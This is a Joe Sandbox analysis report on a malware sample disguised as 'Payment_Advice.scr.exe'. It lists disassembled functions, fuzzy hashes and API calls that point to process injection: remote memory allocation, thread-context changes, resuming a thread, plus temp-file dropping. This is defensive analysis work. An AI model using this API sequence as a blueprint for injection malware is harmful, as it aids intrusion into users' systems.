API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 32dadc6af0e9481a857be2b984b5a209471efae0e82cf0fac9a1f8752c1627b1
Instruction ID: be064d6fa14079c5268fb074962e904222c91fdf2fe15a0598acfcdca590f865
Opcode Fuzzy Hash: 32dadc6af0e9481a857be2b984b5a209471efae0e82cf0fac9a1f8752c1627b1
Instruction Fuzzy Hash: 7941BAB5D012589FDF00CFA9D984ADEFBF1BB49314F10902AE418B7200D774AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0297A758 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0297A802

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c62f3cb00b30769aa369f3c6b65dfa3ae91f3f1128a0d9cd3eb0d2407ac9f1e0
Instruction ID: d8c3698c429646615cac3b7ce43d16dcd11c34da9c621c4ff407a0dedb4ce241
Opcode Fuzzy Hash: c62f3cb00b30769aa369f3c6b65dfa3ae91f3f1128a0d9cd3eb0d2407ac9f1e0
Instruction Fuzzy Hash: 8B31A8B9D00258DFCF10CFA9D980ADEFBB1BB49310F10A42AE814B7210D775A902CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0297B988 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0297BA35

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 329298853d146916ebca07a9ed67790ac5a8fd2168b3ac66af9ee89033f284a1
Instruction ID: f60716f3892d1d5ba66c6c94fc7beef0392666313b2be9fd42b6e852eec6a929
Opcode Fuzzy Hash: 329298853d146916ebca07a9ed67790ac5a8fd2168b3ac66af9ee89033f284a1
Instruction Fuzzy Hash: 953154B9D042589FCF10CFAAD984ADEFBF5BB19314F10A06AE818B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0297A4D8 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0297A587

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5c53b14d17d8da9587e52696501bca736b98ef803ad39f497d405949ae07c880
Instruction ID: 5ec02e334052dbafe2a0633d58aeb612bea024566a278f2d187a14d0cc6acc8c
Opcode Fuzzy Hash: 5c53b14d17d8da9587e52696501bca736b98ef803ad39f497d405949ae07c880
Instruction Fuzzy Hash: 4D31B8B5D01258DFDB10CFAAD984AEEBBF1BF48310F24802AE418B7240D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0297B878 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32(?,?), ref: 0297B922

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed338daba10d5f13cda34707311b130fab658646c911f22e35795b22dfbe2bc8
Instruction ID: 251d7e4163a96c260ba99b467d244eed90b112c3c57ad81dd0fa194194a39f2a
Opcode Fuzzy Hash: ed338daba10d5f13cda34707311b130fab658646c911f22e35795b22dfbe2bc8
Instruction Fuzzy Hash: 953199B5D012589FCB10CFAAD984AEEFBF5BB49314F24902AE418B7350D378A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0297A878 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0297A8F6

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bb7d2a0a1e2c554cbeec1df7ba937fc1742ff5b035306148dd555200836f6f5b
Instruction ID: 99df9fc6cff245c89643e3a8c8d1c7e7f7b83e9ee5b7e6b56f8790cc6c4507b9
Opcode Fuzzy Hash: bb7d2a0a1e2c554cbeec1df7ba937fc1742ff5b035306148dd555200836f6f5b
Instruction Fuzzy Hash: 6D31B8B4D012599FDB10CFAAD984A9EFBF4AB48310F10942AE818B7200D775A901CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0116D4CC Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2101108929.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8eaf299223abe596498f82f864f52b0f0023e52f0b0d8280cd6b8870938b736
Instruction ID: 72a8c0aee87d9d023068dade8a011e2d60c9900ac4cb2175530167b01288dca8
Opcode Fuzzy Hash: b8eaf299223abe596498f82f864f52b0f0023e52f0b0d8280cd6b8870938b736
Instruction Fuzzy Hash: 352148B2604240DFDF09DF54E9C0B26BF79FB88318F20856CE9494B656C337D426CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0116D4C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2101108929.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_116d000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 23bdff31a1df095d142daf897a3d05645700dc5ee0b4863488112360ad1acc52
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 1711AFB6504284CFCF16CF54E5C4B16BF72FB84314F2486A9D8494B656C33AD466CBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Payment_Advice.scr.exePID: 3164, Parent PID: 2744COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	49.6%
Signature Coverage:	1.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	24

Executed Functions

Function 0040A3D2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(031E0000,00000000,00000000,?), ref: 0040DF07

GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A3E9
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A3F6
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A408
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A415
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A41A

Strings

GetLongPathNameW, xrefs: 0040A402
Kernel32.DLL, xrefs: 0040A3EF

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 1993255246-2943376620
Opcode ID: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
Instruction ID: b8eaa96d95d423bee739d1602c6bca055f31ac76d99c59a5b90b98edd4677545
Opcode Fuzzy Hash: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
Instruction Fuzzy Hash: 84F0BE362012193B82102BB5AC4CEAB3EACDEC6765701403AF905E2256DAA88C1082BD

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABC0 Relevance: 3.9, APIs: 2, Instructions: 859memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(-00001000,00001000,00000004,?,?), ref: 0041B72E
VirtualProtect.KERNELBASE(-00001000,00001000), ref: 0041B743

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
Instruction ID: 845c112435ebdd20d252d0e7b86ba5fa5c066f1ca220771698299a65b16c9747
Opcode Fuzzy Hash: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
Instruction Fuzzy Hash: 5472AE315083558FD324CF28C8806AABBF1FF99384F154A2EE9A5CB351E375D985CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00401005 Relevance: 10.6, APIs: 7, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040DA70: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
Part of subcall function 0040DA70: TlsAlloc.KERNEL32 ref: 0040DA87

Part of subcall function 00409780: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789

Part of subcall function 004092A9: RtlInitializeCriticalSection.NTDLL(004176A8), ref: 004092D1

Part of subcall function 00408A2E: memset.MSVCRT ref: 00408A3B
Part of subcall function 00408A2E: 74EEE3E0.COMCTL32(00000008), ref: 00408A55
Part of subcall function 00408A2E: CoInitialize.OLE32(00000000), ref: 00408A5D

Part of subcall function 004053B5: RtlInitializeCriticalSection.NTDLL(00417680), ref: 004053BA

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2

Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A058
Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A071
Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A07B

Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(00000000,00000034), ref: 00409F9B
Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(FFFFFFF5,00000008), ref: 00409FB0

Part of subcall function 0040D80A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
Part of subcall function 0040D80A: memset.MSVCRT ref: 0040D875

Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB

Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39

Part of subcall function 0040195B: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
Part of subcall function 0040195B: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
Part of subcall function 0040195B: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE

ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011A5
HeapDestroy.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011B5
ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011BA

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorExitHandleLastLibraryProcessSectionValue$AllocDestroyEnumLoadModuleResourceTypes
String ID:
API String ID: 784591235-0
Opcode ID: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
Instruction ID: 96b79c542ec5316184d4d87f6a3bcb960f47177df14ebed8d3aa0abc3d7ae58b
Opcode Fuzzy Hash: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
Instruction Fuzzy Hash: B7316271B84701A9E210FBF39C43F9E29289B0874CF51803FB655B50E3DEBD99458A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A700 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A771
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7B2
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7FC
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,-00000004,?,00000000,00000000), ref: 0040A81E
RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040A857
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040A8AA

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$Create$AllocateHeapPointer
String ID:
API String ID: 1439325152-0
Opcode ID: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
Instruction ID: 6d6c67b9194597d88171865bc2adb6fdabd1a806897bce184725f7e599815194
Opcode Fuzzy Hash: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
Instruction Fuzzy Hash: 7251D472600300ABE3219F24DC44B67BAE5EB44764F248A3AF941B73E0D775DC56CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00401EF4 Relevance: 7.6, APIs: 5, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17

GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018
GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 0040206D
PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00402078
PathRenameExtensionW.SHLWAPI(00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 004020B7

Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB

Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39

Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77

Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(031E0000,00000000,?,?), ref: 0040DB5C

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileNameTempValue$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID:
API String ID: 2266526482-0
Opcode ID: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
Instruction ID: 388e51baf881495eeb61f06cd03d467195245f6dd8312115448fbdabe8adfc61
Opcode Fuzzy Hash: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
Instruction Fuzzy Hash: E041D9B1518300BAD601FBA1DC92E7E7B7DEBC4318F10983FB541B50A3CA3D98599A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D459 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D49A
RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0040D4D1
RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D52A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000), ref: 0040D53B
RtlInitializeCriticalSection.NTDLL(00000020), ref: 0040D577

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
String ID:
API String ID: 2823868979-0
Opcode ID: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
Instruction ID: a50e7e251860d517ee994747b31fe6338d0b473a1999477304611f5aff0d6b84
Opcode Fuzzy Hash: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
Instruction Fuzzy Hash: 483180B2D00702ABC3208F99EC44A56BBF5FB44714B15863FE855A77A0D738E948CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401D59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathQuoteSpacesW.SHLWAPI(?,00000000,00000000), ref: 00401DBA
ShellExecuteExW.SHELL32(?), ref: 00401E4B
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E6A

Strings

open, xrefs: 00401E22, 00401E27, 00401E2F

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CodeExecuteExitPathProcessQuoteShellSpaces
String ID: open
API String ID: 1854933444-2758837156
Opcode ID: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
Instruction ID: df19a793e904a2cb908132f9fea35eb48c66dc9965ad0194baf149ad38cba133
Opcode Fuzzy Hash: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
Instruction Fuzzy Hash: 1C310F71908305AFD700FFA1D895A5FB7A9EF84704F10883EF448A6192D77CE909DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040195B Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17

Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB

Part of subcall function 004092D8: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
Part of subcall function 004092D8: wcscmp.MSVCRT ref: 00409302
Part of subcall function 004092D8: memmove.MSVCRT ref: 0040931A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE

Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77

Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
Instruction ID: 459b1afe37edd6916da7380a986df78a8a6a67bc14a1ea681291f0eb1f2bbc51
Opcode Fuzzy Hash: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
Instruction Fuzzy Hash: 5B51FDB5A18300BAE600BBB29D86E7F766DDBC4718F14883FB541B50D3DA3CD8495A2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC60 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AC98
memcpy.MSVCRT ref: 0040ACD2

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
Instruction ID: ce1a83e1c3ead8ae0272be6989b960d763ef5069eb00787365914be1b681847d
Opcode Fuzzy Hash: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
Instruction Fuzzy Hash: DA31593A2047009FC220DF29E844EABB7E5EFD8315F04882EE59AD7750D235E919CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB00 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39
RtlReAllocateHeap.NTDLL(031E0000,00000000,?,?), ref: 0040DB5C

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
Instruction ID: f09a8abe608f87049d0136dfdb2c949314b1adfa7a33e0a903a3785f462648d7
Opcode Fuzzy Hash: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
Instruction Fuzzy Hash: 8411CB74A00208FFC704DF98D894E9ABBB6FF89314F10C169E9099B394D735AE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A305 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040A323
wcslen.MSVCRT ref: 0040A335
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A375

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
Instruction ID: 9db04ce1a0381f01c02530f667c42a9535ab4d679698852ad046a5b866225bd9
Opcode Fuzzy Hash: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
Instruction Fuzzy Hash: CA016CB140131896CB24DB74C85DAAEB364DF04304F2441B7DD15E21D1E7799AA4DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408A2E Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408A3B
74EEE3E0.COMCTL32(00000008), ref: 00408A55
CoInitialize.OLE32(00000000), ref: 00408A5D

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Initializememset
String ID:
API String ID: 640720207-0
Opcode ID: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
Instruction ID: ac5f13dc28c04c2a22c35059db173eb0360c4c60f11cda37de6548a0ec479162
Opcode Fuzzy Hash: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
Instruction Fuzzy Hash: 18E0ECB594030CBBEB409FD0EC0EF9DBB7CEB05705F4045B9F904A6281EBB5A6088B95

Uniqueness

Uniqueness Score: -1.00%

Function 00403A79 Relevance: 3.6, APIs: 2, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(031E0000,00000000,?), ref: 0040DB39

Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
